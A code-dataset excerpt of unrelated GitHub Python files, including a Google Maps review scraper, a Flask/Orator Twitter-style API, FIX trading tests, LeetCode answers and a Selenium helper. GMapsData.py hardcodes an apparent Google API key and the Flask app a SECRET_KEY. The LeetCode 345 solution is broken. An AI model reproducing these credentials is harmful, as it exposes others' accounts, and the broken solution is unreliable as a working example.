#\n\n\n\n\n\ntransition_table[(3, '}')] = 203\ntransition_table[(0, '}')] = 203\ntransition_table[(202, '}')] = 203\ntransition_table[(203, '}')] = 203\ntransition_table[(203, ' ')] = 128\n\n#transition_table[(0, '?')] = 55\n#final state\ntransition_table[(1, ';')] = 31\ntransition_table[(25, ';')] = 31\ntransition_table[(19, ';')] = 31\ntransition_table[(36, ';')] = 31\ntransition_table[(49, ';')] = 31\ntransition_table[(54, ';')] = 31\ntransition_table[(3, ';')] = 31\n\n\ntransition_table[(31, '}')] = 203\n\n\n\naccepting_states = {31, 203, 201}\n\n\nlexer = Lexer(transition_table, accepting_states)\nfilename = 'input.txt'\ncode = ''\nwith open(filename, 'r') as file:\n print('---- LEXER ----')\n for line in file:\n line = line.strip()\n if line:\n #valid_syntax, current_token, current_state, table = lexer.get_next_token(line)\n tokenTable = lexer.get_next_token(line)\n #code = code + line + ' '\n\n\n\nparser = Parser(tokenTable)\nast = parser.parse_sel()\nprint()\nprint('---- PASER ----')\nprint(ast)\nvisitor = XmlVisitor(ast)\nvisitor.generate_xml()\nvisitor.write_to_file('output.xml')\n\nprint()\nprint('---- Semantic Analysis ----')\nSemanticAnalysis = SemanticAnalysis(ast)\n#print(xml)\nprint()\nprint('-*-*-*-THE END-*-*-*-')\n\n","repo_name":"NicholasVella08/Compiler-Theory-and-Practice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":58026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"11861586318","text":"import googlemaps\nimport urlparse\nimport io\nimport json\n\nclass GMapsData:\n _key = 'AIzaSyA0Yst-qoirbQMooKig-qHPRTA2SCMiuFc'\n _gmaps = googlemaps.Client(_key)\n\n def __init__(self):\n self._review = []\n self._user = []\n self._poi = []\n\n def _placeId(self, poi):\n placesResult = self._gmaps.places_nearby((poi['latitude'], poi['longitude']), name=poi['name'], rank_by='distance', language='pt-BR')\n for d in placesResult['results']:\n if 'place_id' in d:\n return d['place_id']\n return None\n\n def _reviews(self, placeId, poi):\n placeDetail = self._gmaps.place(placeId)\n result = placeDetail['result']\n if 'reviews' in result:\n reviews = result['reviews']\n gen = (review for review in reviews if 'author_url' in review)\n\n i = {}\n i['item_id'] = poi['id']\n i['name'] = poi['name']\n i['category'] = poi['type']\n i['latitude'] = poi['latitude']\n i['longitude'] = poi['longitude']\n self._poi.append(i)\n\n for review in gen:\n r = {}\n # user_id\n pathUrl = urlparse.urlparse(review['author_url']).path\n r['user_id'] = int(pathUrl.split(\"/\")[3])\n r['item_id'] = poi['id']\n r['rating'] = review['rating']\n self._review.append(r)\n\n u = {}\n u['user_id'] = r['user_id']\n u['name'] = review['author_name']\n self._user.append(u)\n\n def data(self, listPoi):\n for poi in listPoi:\n placeId = self._placeId(poi)\n if placeId:\n self._reviews(placeId, poi)\n\n def json(self):\n with io.open('data/poi.json', 'w', encoding='utf8') as poi_file:\n poi_file.write(unicode(json.dumps(self._poi, ensure_ascii=False)))\n with io.open('data/review.json', 'w', encoding='utf8') as review_file:\n review_file.write(unicode(json.dumps(self._review, ensure_ascii=False)))\n with io.open('data/user.json', 'w', encoding='utf8') as user_file:\n user_file.write(unicode(json.dumps(self._user, ensure_ascii=False)))","repo_name":"mmsdivino/Tourisys","sub_path":"poi/GMapsData.py","file_name":"GMapsData.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"22498241745","text":"import logging\nimport time\n\nfrom custom import basic_custom_actions as bca\nfrom rule_management import RuleManager, Simulators\nfrom test_framework.fix_wrappers.FixManager import FixManager\nfrom test_framework.fix_wrappers.FixVerifier import FixVerifier\nfrom test_framework.fix_wrappers.oms.FixMessageAllocationInstructionReportOMS import \\\n FixMessageAllocationInstructionReportOMS\nfrom test_framework.fix_wrappers.oms.FixMessageConfirmationReportOMS import FixMessageConfirmationReportOMS\nfrom test_framework.fix_wrappers.oms.FixMessageExecutionReportOMS import FixMessageExecutionReportOMS\nfrom test_framework.fix_wrappers.oms.FixMessageNewOrderSingleOMS import FixMessageNewOrderSingleOMS\nfrom pathlib import Path\nfrom test_framework.core.test_case import TestCase\nfrom test_framework.core.try_exept_decorator import try_except\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\ntimeouts = True\n\n\n@try_except(test_id=Path(__file__).name[:-3])\nclass QAP_T7444(TestCase):\n @try_except(test_id=Path(__file__).name[:-3])\n def __init__(self, report_id, session_id=None, data_set=None, environment=None):\n super().__init__(report_id, session_id, data_set, environment)\n self.test_id = bca.create_event(Path(__file__).name[:-3], self.report_id)\n self.fix_env = self.environment.get_list_fix_environment()[0]\n self.fix_manager = FixManager(self.fix_env.sell_side, self.test_id)\n self.fix_verifier = FixVerifier(self.fix_env.sell_side, self.test_id)\n self.fix_verifier_dc = FixVerifier(self.fix_env.drop_copy, self.test_id)\n self.fix_message = FixMessageNewOrderSingleOMS(self.data_set).set_default_dma_limit()\n self.client = self.data_set.get_client_by_name(\"client_counterpart_3\")\n self.client_acc = self.data_set.get_account_by_name(\"client_counterpart_3_acc_1\")\n self.change_params = {'Account': self.client,\n 'PreAllocGrp': {\n 'NoAllocs': [{\n 'AllocAccount': self.client_acc,\n 'AllocQty': \"100\"}]}}\n self.fix_message.change_parameters(self.change_params)\n self.fix_message.change_parameter('Account', self.client)\n self.qty = self.fix_message.get_parameter('OrderQtyData')['OrderQty']\n self.price = self.fix_message.get_parameter(\"Price\")\n self.mic = self.data_set.get_mic_by_name(\"mic_1\")\n self.rule_manager = RuleManager(Simulators.equity)\n self.client_for_rule = self.data_set.get_venue_client_names_by_name(\"client_counterpart_3_venue_1\")\n\n @try_except(test_id=Path(__file__).name[:-3])\n def run_pre_conditions_and_steps(self):\n # region Declaration\n try:\n nos_rule = self.rule_manager.add_NewOrdSingleExecutionReportPendingAndNew_FIXStandard(self.fix_env.buy_side,\n self.client_for_rule,\n self.mic,\n int(self.price))\n trade_rule = self.rule_manager.add_NewOrdSingleExecutionReportTrade_FIXStandard(self.fix_env.buy_side,\n self.client_for_rule,\n self.mic, int(self.price),\n int(self.qty), 2)\n\n self.fix_manager.send_message_and_receive_response_fix_standard(self.fix_message)\n finally:\n time.sleep(1)\n self.rule_manager.remove_rule(nos_rule)\n self.rule_manager.remove_rule(trade_rule)\n # endregion\n # region Set-up parameters for ExecutionReports\n list_of_ignored_fields = ['Account', 'PartyRoleQualifier', 'ReplyReceivedTime', 'OrderAvgPx',\n 'GatingRuleCondName', 'GatingRuleName', 'tag11245',\"NoPartySubIDs\",\n 'ExecAllocGrp']\n party_stub_dict = {'PartyRole': \"*\",\n 'PartyID': \"*\",\n 'PartyIDSource': \"*\"}\n parties = {\n 'NoPartyIDs': [\n {'PartyRole': \"67\",\n 'PartyID': \"InvestmentFirm - ClCounterpart_3\",\n 'PartyIDSource': \"C\"},\n party_stub_dict,\n party_stub_dict,\n party_stub_dict,\n party_stub_dict\n ]\n }\n exec_report1 = FixMessageExecutionReportOMS(self.data_set).set_default_new(self.fix_message).change_parameters(\n {\"Parties\": parties, \"ReplyReceivedTime\": \"*\", \"SecondaryOrderID\": \"*\", \"LastMkt\": \"*\", \"Text\": \"*\"})\n parties = {\n 'NoPartyIDs': [\n {'PartyRole': \"67\",\n 'PtysSubGrp': '*',\n 'PartyID': \"InvestmentFirm - ClCounterpart_3\",\n 'PartyIDSource': \"C\"},\n party_stub_dict,\n party_stub_dict,\n party_stub_dict,\n party_stub_dict\n ]\n }\n exec_report2 = FixMessageExecutionReportOMS(self.data_set).set_default_filled(\n self.fix_message).change_parameters(\n {\"Parties\": parties,\n \"ReplyReceivedTime\": \"*\",\n \"SecondaryOrderID\": \"*\",\n \"LastMkt\": \"*\",\n \"Text\": \"*\",\n \"Instrument\": \"*\", \"Account\": self.client_acc})\n exec_report2.remove_parameter(\"SettlCurrency\")\n # endregion\n # region Check ExecutionReports\n time.sleep(6)\n self.fix_verifier.check_fix_message_fix_standard(exec_report1, ignored_fields=list_of_ignored_fields)\n self.fix_verifier.check_fix_message_fix_standard(exec_report2, ignored_fields=list_of_ignored_fields)\n # endregion\n # region Set-up parameters Confirmation report\n regulatory_body = self.data_set.get_counterpart_id_fix('counterpart_id_regulatory_body_venue_paris')\n regulatory_body.update({'NoPartySubIDs': {'M_NoPartySubID': [\n {\n 'PartySubIDType': '4',\n 'PartySubID': 'SB·-·RegulatoryBody'\n }\n ]}})\n investment_firm_client_counterpart = self.data_set.get_counterpart_id_fix('counterpart_id_investment_firm_cl_counterpart_sa3')\n investment_firm_client_counterpart.update({'NoPartySubIDs': {'M_NoPartySubID': [\n {\n 'PartySubIDType': '16',\n 'PartySubID': 'quod@quodfinancial.com'\n }\n ]}})\n custodian_user_2 = self.data_set.get_counterpart_id_fix('counterpart_id_custodian_user_2')\n market_maker_th2_route = self.data_set.get_counterpart_id_fix('counterpart_id_market_maker_th2_route')\n no_party_alloc = [\n market_maker_th2_route,\n custodian_user_2,\n regulatory_body,\n {'PartyRole': \"67\",\n 'PartyID': \"InvestmentFirm - ClCounterpart_3\",\n 'PartyIDSource': \"C\",\n \"NoPartySubIDs\":\"*\"}\n ]\n alloc_grp = {'NoAllocs': [{'IndividualAllocID': \"*\",\n 'AllocNetPrice': self.price,\n 'AllocPrice': self.price,\n 'AllocAccount': self.client_acc,\n 'AllocQty': \"100\"}]}\n alloc_report = FixMessageAllocationInstructionReportOMS().set_default_preliminary(\n self.fix_message).change_parameters(\n {\"NoParty\": no_party_alloc, \"Account\": self.client, \"tag5120\": \"*\", 'NoAllocs': alloc_grp})\n # endregion\n # region Check Book & Allocation\n self.fix_verifier_dc.check_fix_message_fix_standard(alloc_report, ignored_fields=list_of_ignored_fields)\n conf_report = FixMessageConfirmationReportOMS(self.data_set).set_default_confirmation_new(\n self.fix_message)\n conf_report.change_parameters({'tag5120': \"*\", \"Account\": self.client})\n self.fix_verifier_dc.check_fix_message_fix_standard(conf_report, ignored_fields=list_of_ignored_fields)\n # endregion\n","repo_name":"YevhenMoroz/th2-script-quod-demo","sub_path":"test_cases/eq/Counterpart/QAP_T7444.py","file_name":"QAP_T7444.py","file_ext":"py","file_size_in_byte":8388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"23711310","text":"import logging\n\nfrom google.appengine.ext import ndb\n\n\nclass AccountSettings(ndb.Model):\n \"\"\"Accound settings DB model to keep roomba settings for user\"\"\"\n userid = ndb.StringProperty()\n agent_url = ndb.StringProperty()\n device_mac = ndb.StringProperty()\n\n @classmethod\n def get_user_by_id(cls, user_id):\n return cls.query(cls.userid == user_id)\n\n\nclass AccountSettingsHelper():\n \"\"\"add new user to a database if user is not yet created\n will create [UsersNdbModel(key=Key('UsersNdbModel', 6473924464345088), user_id=u'185804764220139124118', user_role=u'admin')]\n \"\"\"\n\n def add_new_user(self, user_id):\n usr = AccountSettings(key=ndb.Key(AccountSettings, user_id))\n usr.userid = user_id\n usr.put()\n\n def user_exists(self, user_id):\n \"\"\"Check if user already exists\n Returns: True if exists False otherwise\n \"\"\"\n\n qry = AccountSettings().get_user_by_id(user_id)\n res = qry.fetch()\n if res:\n return True\n else:\n return False\n\n def update_device_information(self, user_id, agent_url=None, device_mac=None):\n \"\"\" update agent url and/or device_mac \"\"\"\n\n if self.user_exists(user_id):\n\n usr_key = ndb.Key(AccountSettings, user_id)\n usr = usr_key.get()\n if agent_url:\n usr.agent_url = agent_url\n if device_mac:\n usr.device_mac = device_mac\n usr.put()\n return True\n else:\n logging.error(\"Cannot update information for non-existing user\")\n return False\n\n def get_user_info(self, user_id):\n \"\"\" Returns information about user form db\"\"\"\n\n if self.user_exists:\n usr_key = ndb.Key(AccountSettings, user_id)\n usr = usr_key.get()\n return usr\n else:\n logging.error(\"User %s doesn't exist in db\" % user_id)\n","repo_name":"elinesterov/imp-roomba-gae-app","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"24705973010","text":"import pandas as pd\n\n\ndef calculate_tariff(file_name):\n data_frame = pd.read_json(file_name)\n data_frame['tariff'] = data_frame['highway_cost'] / data_frame['products'].apply(\n lambda x: sum(item['quantity'] for item in x))\n\n unique_warehouses = data_frame[['warehouse_name', 'tariff']].drop_duplicates()\n\n return data_frame\n\n\ndef field_sum_calculation(data):\n data_frame = data\n\n # Развертывание столбца 'products' и вычисление суммарных значений\n aggregated_data = data_frame['products'].explode().apply(pd.Series)\n aggregated_data['income'] = aggregated_data['quantity'] * aggregated_data['price']\n aggregated_data['expenses'] = aggregated_data['quantity'] * data_frame['tariff']\n aggregated_data['profit'] = aggregated_data['income'] - aggregated_data['expenses']\n # Группировка по товару и суммирование\n grouped_data = aggregated_data.groupby('product').sum().reset_index()\n # Переименование столбцов\n table = grouped_data[['product', 'quantity', 'income', 'expenses', 'profit']]\n\n return table\n\n\ndef profit_calculation(data):\n data_frame = data\n\n # Вычисление прибыли для каждого заказа\n data_frame['order_profit'] = data_frame['products'].apply(\n lambda x: sum(item['quantity'] * item['price'] for item in x)) + data_frame['tariff'] * data_frame[\n 'products'].apply(lambda x: sum(item['quantity'] for item in x))\n\n # Создание таблицы с нужными столбцами 'order_id' и 'order_profit'\n table = data_frame[['order_id', 'order_profit']]\n return table\n\n\nif __name__ == '__main__':\n file_path = 'trail_task.json'\n data_frame = calculate_tariff(file_path)\n unique_warehouses = data_frame[['warehouse_name', 'tariff']].drop_duplicates()\n print(unique_warehouses)\n print(field_sum_calculation(data_frame))\n print(profit_calculation(data_frame))\n data_frame = profit_calculation(data_frame)\n average_profit = data_frame['order_profit'].mean()\n print(\"Средняя прибыль заказов:\", average_profit)\n","repo_name":"HosaruLDV/trail_task","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"23766945117","text":"\"\"\"Tests for BasicFrontend.\"\"\"\n# pylint: disable=invalid-name\n\nimport io\nfrom typing import List\n\nfrom quietex.frontend import BasicFrontend\n\n\nclass StringBasicFrontend(BasicFrontend):\n \"\"\"BasicIO which records its outputs in a StringIO.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._output = io.StringIO()\n\n def _write(self, raw_value):\n return self._output.write(raw_value)\n\n def _input(self, raw_prompt):\n self._write(raw_prompt + \"\\n\")\n return \"\"\n\n @property\n def output(self):\n \"\"\"Everything printed so far, as a string.\"\"\"\n return self._output.getvalue()\n\n def assert_display_like(self, lines):\n r\"\"\"Make an assertion about what's on the display.\n\n If `lines` is a string, assert that the output so far is equal to it. If\n `lines` is a list of strings, assert that the output so far is equal to those\n strings joined with \\n.\n\n Roughly compatible with test_TerminalFrontend.FakeTerminalFrontend.\n \"\"\"\n if isinstance(lines, str):\n lines = [lines]\n assert self.output == \"\\n\".join(lines)\n\n\ndef test_simple():\n \"\"\"Print some plain text and check that the status bar is not printed.\"\"\"\n frontend = StringBasicFrontend()\n frontend.print(\"Test\")\n assert frontend.output == \"Test\\n\"\n\n\ndef test_state():\n \"\"\"Check that printing StartPage and OpenFile triggers the status bar.\"\"\"\n frontend = StringBasicFrontend()\n frontend.print(\"(./test.tex [1]\")\n assert frontend.output == \"(./test.tex [1]\\n[1] (./test.tex)\\n\"\n\n\ndef test_log_newline():\n \"\"\"Test that printing a log message puts newlines in the right places.\"\"\"\n frontend = StringBasicFrontend()\n frontend.print(\"test [1]\")\n frontend.log(\"log\")\n assert frontend.output == \"test [1]\\n[1]\\nlog\\n\"\n frontend.log(\"log2\")\n assert frontend.output == \"test [1]\\n[1]\\nlog\\nlog2\\n\"\n\n\nEXAMPLE_OUTPUT = [\n \"(./open.tex \",\n \"error [1]\",\n \"test\",\n \"\",\n \"{./aux.map}\",\n \"<./image.png>\",\n \"warning [2]\",\n \")\",\n]\nEXAMPLE_VERBOSE = [\n \"(./open.tex \",\n \"(./open.tex)\",\n \"error [1]\",\n \"[1] (./open.tex)\",\n \"test\",\n \"\",\n \"{./aux.map}\",\n \"<./image.png>\",\n \"warning [2]\",\n \"[2] (./open.tex)\",\n \")\",\n \"[2]\",\n \"Log message\",\n \"? \",\n \"\",\n]\nEXAMPLE_QUIET = [\n \" \",\n \"(./open.tex)\",\n \"error [1]\",\n \"[1] (./open.tex)\",\n \"test\",\n \"\",\n \"warning [2]\",\n \"[2] (./open.tex)\",\n \"[2]\",\n \"? \",\n \"\",\n]\n\n\ndef _frontend_integration_test(frontend, output: List[str], expected: List[str]):\n for line in output:\n frontend.print(line)\n frontend.log(\"Log message\")\n frontend.input(\"? \")\n frontend.assert_display_like(expected)\n\n\ndef test_verbose():\n \"\"\"Test printing each type of token in verbose mode.\"\"\"\n _frontend_integration_test(StringBasicFrontend(), EXAMPLE_OUTPUT, EXAMPLE_VERBOSE)\n\n\ndef test_quiet():\n \"\"\"Test printing each type of token in quiet mode.\"\"\"\n frontend = StringBasicFrontend(quiet=True)\n _frontend_integration_test(frontend, EXAMPLE_OUTPUT, EXAMPLE_QUIET)\n\n\ndef test_error_bell():\n \"\"\"Test that printing an error adds a bell character.\"\"\"\n frontend = StringBasicFrontend(bell_on_error=True)\n frontend.print(\"! Generic error\")\n assert \"\\a\" in frontend.output\n\n\ndef test_print_partial():\n \"\"\"Test that trying to print a partial line does nothing.\"\"\"\n frontend = StringBasicFrontend()\n frontend.print(\"test\", finished=False)\n assert frontend.output == \"\"\n","repo_name":"mje-nz/quietex","sub_path":"test/test_BasicFrontend.py","file_name":"test_BasicFrontend.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"40404406823","text":"#\n# @lc app=leetcode id=345 lang=python3\n#\n# [345] Reverse Vowels of a String\n#\n\n# @lc code=start\nclass Solution:\n def reverseVowels(self, s: str) -> str:\n \n stack = []\n i = 0\n for k in s:\n stack.append(k)\n \n while stack:\n s[i] = stack.pop()\n\n i += 1\n \n# @lc code=end\n\n","repo_name":"E-dmp/LeetCode","sub_path":"345.reverse-vowels-of-a-string.py","file_name":"345.reverse-vowels-of-a-string.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"33527715032","text":"#!/bin/env python3\n\nimport time\nfrom selenium import webdriver\nfrom selenium.common.exceptions import *\nfrom selenium.webdriver.remote.webelement import WebElement\n\nclass Query:\n\tclass All(str):\n\t\tpass\n\tclass Script(str):\n\t\t@staticmethod\n\t\tdef format(s):\n\t\t\treturn '''\n\t\t\t\tfunction $r(...r) { return Array.from(...r) }\n\t\t\t\tfunction $q(...r) { return document.querySelector(...r) }\n\t\t\t\tfunction $qq(...r) { return document.querySelectorAll(...r) }\n\t\t\t\tfunction $qqr(...r) { return $r($qq(...r)) }\n\t\t\t''' + s\n\t\tpass\n\nclass TimeoutException(Exception):\n\tpass\n\nclass Wait:\n\t@staticmethod\n\tdef sleep(secs):\n\t\ttime.sleep(secs)\n\t@staticmethod\n\tdef until(check,interval=.25,timeout=10):\n\t\tstart = time.time()\n\t\tfor i in range(int(float(timeout) / interval)+1):\n\t\t\tif time.time()-start > timeout:\n\t\t\t\tbreak\n\t\t\tv = check()\n\t\t\tif not (v is None):\n\t\t\t\treturn v\n\t\t\ttime.sleep(interval)\n\t\traise TimeoutException( \\\n\t\t\t'Wait.until timeout: %i, %i' % (interval,timeout))\n\nclass Act:\n\t@staticmethod\n\tdef click(z,n):\n\t\tprint('clicking',n)\n\t\tz.execute_script('arguments[0].click()',n)\n\t\treturn n\n\t@staticmethod\n\tdef focus(z,n):\n\t\tz.execute_script('arguments[0].focus()',n)\n\t\treturn n\n\t@staticmethod\n\tdef value(z,n):\n\t\treturn z.execute_script('arguments[0].value',n)\n\t@staticmethod\n\tdef repeat(f,interval=.1,count=10):\n\t\terr = None\n\t\tfor i in range(count):\n\t\t\ttry:\n\t\t\t\treturn f()\n\t\t\texcept Exception as e:\n\t\t\t\terr = e\n\t\t\ttime.sleep(interval)\n\t\traise err\n\nclass qtable:\n\t_driver = None\n\t_table = {}\n\t\n\tdef __init__(self,driver,table={},**kw):\n\t\tself._driver = driver\n\t\tself.add(table,**kw)\n\t\n\tdef __getitem__(self,k):\n\t\treturn getattr(self,k)\n\t\n\tdef __setitem__(self,k,v):\n\t\treturn setattr(self,k,v)\n\t\n\tdef __getattr__(self,k):\n\t\tif not (k in self._table):\n\t\t\traise AttributeError('(%s) not found in table:\\n%s' % (\n\t\t\t\tk,\n\t\t\t\t'\\n'.join(self._table.keys())\n\t\t\t))\n\t\tq = self._table[k]\n\t\tif k == 'query':\n\t\t\treturn q\n\t\tif isinstance(q,Query.All):\n\t\t\ttry:\n\t\t\t\treturn self._driver.find_elements_by_css_selector(q)\n\t\t\texcept NoSuchElementException:\n\t\t\t\treturn None\n\t\telif isinstance(q,Query.Script):\n\t\t\tscript = Query.Script.format(q)\n\t\t\treturn self._driver.execute_script(script)\n\t\telse:\n\t\t\ttry:\n\t\t\t\treturn self._driver.find_element_by_css_selector(q)\n\t\t\texcept NoSuchElementException:\n\t\t\t\treturn None\n\t\n\tdef __setattr__(self,k,v):\n\t\t#print('setattr',k,v)\n\t\tif not self._ownattr(k):\n\t\t\treturn super().__setattr__(k,v)\n\t\tn = self[k]\n\t\tif isinstance(n,WebElement):\n\t\t\tself._driver.execute_script('arguments[0].value = arguments[1]',n,v)\n\t\telse:\n\t\t\traise AttributeError()\n\t\n\tdef _ownattr(self,k):\n\t\treturn (k in self._table) or k == 'query'\n\t\n\tdef add(self,table={},**kw):\n\t\tfor k,v in table.items():\n\t\t\tself._table[k] = v\n\t\tfor k,v in kw.items():\n\t\t\tself._table[k] = v\n\n\n","repo_name":"codewillclick/qtable","sub_path":"qtable.py","file_name":"qtable.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29619583662","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom flask import Flask, request\nfrom orator.orm import belongs_to, has_many, belongs_to_many\nfrom flask_orator import Orator, jsonify\n\n# Configuration\nDEBUG = True\nORATOR_DATABASES = {\n 'default': 'twittor',\n 'twittor': {\n 'driver': 'sqlite',\n 'database': os.path.join(os.path.dirname(__file__), 'twittor.db'),\n 'log_queries': True\n }\n}\nSECRET_KEY = '4K5UA6+BMeyNPgYxhjFU03dYA1NlDGrf3wRr8uOcIHU='\n\n# Creating Flask application\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n# Initializing Orator\ndb = Orator(app)\n\n# Models\n\nclass User(db.Model):\n\n __fillable__ = ['name', 'email']\n\n __hidden__ = ['pivot']\n\n @has_many\n def messages(self):\n return Message\n\n @belongs_to_many(\n 'followers',\n 'followed_id', 'follower_id',\n with_timestamps=True\n )\n def followers(self):\n return User\n\n @belongs_to_many(\n 'followers',\n 'follower_id', 'followed_id',\n with_timestamps=True\n )\n def followed(self):\n return User\n\n def is_following(self, user):\n return self.followed().where('followed_id', user.id).exists()\n\n def is_followed_by(self, user):\n return self.followers().where('follower_id', user.id).exists()\n\n def follow(self, user):\n if not self.is_following(user):\n self.followed().attach(user)\n\n def unfollow(self, user):\n if self.is_following(user):\n self.followed().detach(user)\n\n\nclass Message(db.Model):\n\n __fillable__ = ['content']\n\n @belongs_to\n def user(self):\n return User\n\n\n# Routes\n\n# Users\n\n@app.route('/users', methods=['POST'])\ndef create_user():\n user = User.create(**request.get_json())\n\n return jsonify(user)\n\n\n@app.route('/users/', methods=['GET'])\ndef get_user(user_id):\n user = User.find_or_fail(user_id)\n\n return jsonify(user)\n\n\n@app.route('/users', methods=['GET'])\ndef get_all_users():\n users = User.all()\n\n return jsonify(users)\n\n\n@app.route('/users/', methods=['PATCH'])\ndef update_user(user_id):\n user = User.find_or_fail(user_id)\n user.update(**request.get_json())\n\n return jsonify(user)\n\n\n@app.route('/users//messages', methods=['GET'])\ndef get_user_messages(user_id):\n user = User.find_or_fail(user_id)\n\n return jsonify(user.messages)\n\n\n@app.route('/users//messages', methods=['POST'])\ndef create_message(user_id):\n user = User.find_or_fail(user_id)\n\n return jsonify(user.messages().create(**request.get_json()))\n\n\n@app.route('/users//following', methods=['GET'])\ndef get_user_following(user_id):\n user = User.find_or_fail(user_id)\n\n return jsonify(user.followed)\n\n\n@app.route('/users//followers', methods=['GET'])\ndef get_user_followers(user_id):\n user = User.find_or_fail(user_id)\n\n return jsonify(user.followers)\n\n\n@app.route('/users//following/', methods=['PUT'])\ndef follow_user(user_id, followed_id):\n user = User.find_or_fail(user_id)\n followed = User.find_or_fail(followed_id)\n\n user.follow(followed)\n\n return app.response_class('No Content', 204)\n\n@app.route('/users//following/', methods=['DELETE'])\ndef unfollow_user(user_id, followed_id):\n user = User.find_or_fail(user_id)\n followed = User.find_or_fail(followed_id)\n\n user.unfollow(followed)\n\n return app.response_class('No Content', 204)\n\n\n@app.route('/messages/', methods=['GET'])\ndef get_message(message_id):\n message = Message.find_or_fail(message_id)\n\n return jsonify(message)\n\n\n@app.route('/messages/', methods=['PATCH'])\ndef update_message(message_id):\n message = Message.find_or_fail(message_id)\n message.update(**request.get_json())\n\n return jsonify(message)\n\n@app.route('/messages/', methods=['DELETE'])\ndef delete_message(message_id):\n message = Message.find_or_fail(message_id)\n message.delete()\n\n return app.response_class('No Content', 204)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"sdispater/twittor-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"63"} +{"seq_id":"35376070600","text":"import requests\nimport settings\n\ndef verify(token):\n data = {\n 'response': token,\n 'secret': settings.HCAPTCHA_SECRET_KEY\n }\n response = requests.post('https://hcaptcha.com/siteverify', data=data)\n if response.json().get('success'):\n return True\n return False","repo_name":"baealex/notility","sub_path":"server/app/module/hcaptcha.py","file_name":"hcaptcha.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"4294064871","text":"from typing import List\n\nclass Solution:\n def allPathsSourceTarget(self, graph: List[List[int]]) -> List[List[int]]:\n\n # Initializing the result list to store all paths\n result = []\n\n # Helper function to perform Depth First Search (DFS) on the graph\n def dfs(path: List[int]) -> None:\n # When the last node in the path is the target node, add the path to the result list\n if path[-1] == len(graph) - 1:\n result.append(path)\n return\n\n # If not the target node, explore the adjacent nodes recursively using DFS\n for neighbor in graph[path[-1]]:\n dfs(path + [neighbor])\n\n # Start DFS from the source node (0)\n dfs([0])\n\n return result\n\n\n# Test the solution using if __name__ == '__main__' clause\nif __name__ == '__main__':\n sol = Solution()\n\n graph1 = [[1, 2], [3], [3], []]\n assert sol.allPathsSourceTarget(graph1) == [[0, 1, 3], [0, 2, 3]]\n\n graph2 = [[4, 3, 1], [3, 2, 4], [3], [4], []]\n assert sol.allPathsSourceTarget(graph2) == [[0, 4], [0, 3, 4], [0, 1, 3, 4], [0, 1, 2, 3, 4], [0, 1, 4]]\n\n graph3 = [[1], []]\n assert sol.allPathsSourceTarget(graph3) == [[0, 1]]\n\n print(\"All tests passed.\")\n","repo_name":"aurimas13/Solutions-To-Problems","sub_path":"LeetCode/Python Solutions/All Paths From Source to Target/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"63"} +{"seq_id":"35330434745","text":"import numpy as np\r\nimport math\r\n# target area: x=124..174, y=-123..-86\r\ntarget_x = [124, 174]\r\ntarget_y = [-123, -86]\r\n\r\n# target_x = [20, 30]\r\n# target_y = [-10, -5]\r\n\r\ndef get_pos(step, v_init):\r\n return math.floor(step * v_init - (step * (step - 1)) / 2)\r\n\r\ndef get_step_of_furthest_pos(v_init):\r\n return max(v_init + 0.5,0)\r\n\r\ndef is_in_y(y):\r\n return ((y >= target_y[0]) and (y <= target_y[1]))\r\n\r\ndef is_in_x(x):\r\n return ((x >= target_x[0]) and (x <= target_x[1]))\r\n\r\ndef is_in(x, y):\r\n return (is_in_x(x) and is_in_y(y))\r\n\r\ndef part1():\r\n cur_best = 0\r\n for vy in range(-200, 200):\r\n for vx in range(1, 200):\r\n step_y_max = get_step_of_furthest_pos(vy)\r\n y_max = get_pos(step_y_max, vy)\r\n step_x_end = get_step_of_furthest_pos(vx)\r\n x_max = get_pos(step_x_end, vx)\r\n for step in range(math.floor(step_y_max), math.ceil(step_x_end)+500): #math.ceil(step_x_end)):\r\n x_ = max(get_pos(step,vx), x_max)\r\n y_ = get_pos(step,vy)\r\n if is_in(x_, y_):\r\n if y_max > cur_best:\r\n print(\"{},{} -> {}\".format(vx, vy, y_max))\r\n cur_best = y_max\r\n elif x_ > target_x[1]:\r\n break\r\n elif y_ < target_y[0]:\r\n break\r\n\r\ndef part2():\r\n counter_distinct = 0\r\n for vy in range(-600, 600):\r\n for vx in range(1, 550):\r\n flag=False\r\n has_reached_max = False\r\n step_x_end = get_step_of_furthest_pos(vx)\r\n x_max = get_pos(step_x_end, vx)\r\n if x_max >= target_x[0]:\r\n for step in range(0, math.ceil(step_x_end)+1000): #math.ceil(step_x_end)):\r\n x_ = get_pos(step,vx)\r\n if x_ >= x_max:\r\n has_reached_max = True\r\n if has_reached_max:\r\n x_ = x_max\r\n if x_ < 0:\r\n x_ = 